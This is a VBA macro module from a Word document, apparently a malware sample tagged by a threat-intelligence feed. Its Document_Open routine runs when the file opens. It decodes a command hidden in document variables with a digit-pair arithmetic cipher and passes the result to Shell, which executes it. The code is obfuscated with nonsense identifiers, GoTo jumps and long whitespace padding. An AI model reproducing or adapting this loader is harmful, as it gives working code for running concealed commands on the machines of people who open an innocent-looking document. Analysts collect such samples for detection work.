Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit





                                                                            





                                                    






                 






                





                                                    







                   Private Sub outshove(ByVal garniture As String)






                Dim unthinkingly As String








                                                            




          Dim jockos As Long: jockos = 2







                                                        






l2:





          






              If jockos < Len(garniture) Then





              GoTo l1







                   







                                                        




              Else






                   




                            Shell unthinkingly








                                                                







               




                 Exit Sub








                                                    




              




                                                    






                                        End If






           





l1:








                  




            






                                                                            unthinkingly = unthinkingly & Chr(CLng(ActiveDocument.Variables("n41decfc3e63b").Value & Right(Left(garniture, jockos), 2)) - 83)






          jockos = jockos + 2






                                                                        





                                                                        






                                                                    GoTo l2







                                                    End Sub








                                                




                                        




                                                                    Sub Document_Open()








           outshove ActiveDocument.Variables("oe76d92b277bf").Value
End Sub


INQUEST-PP=macro
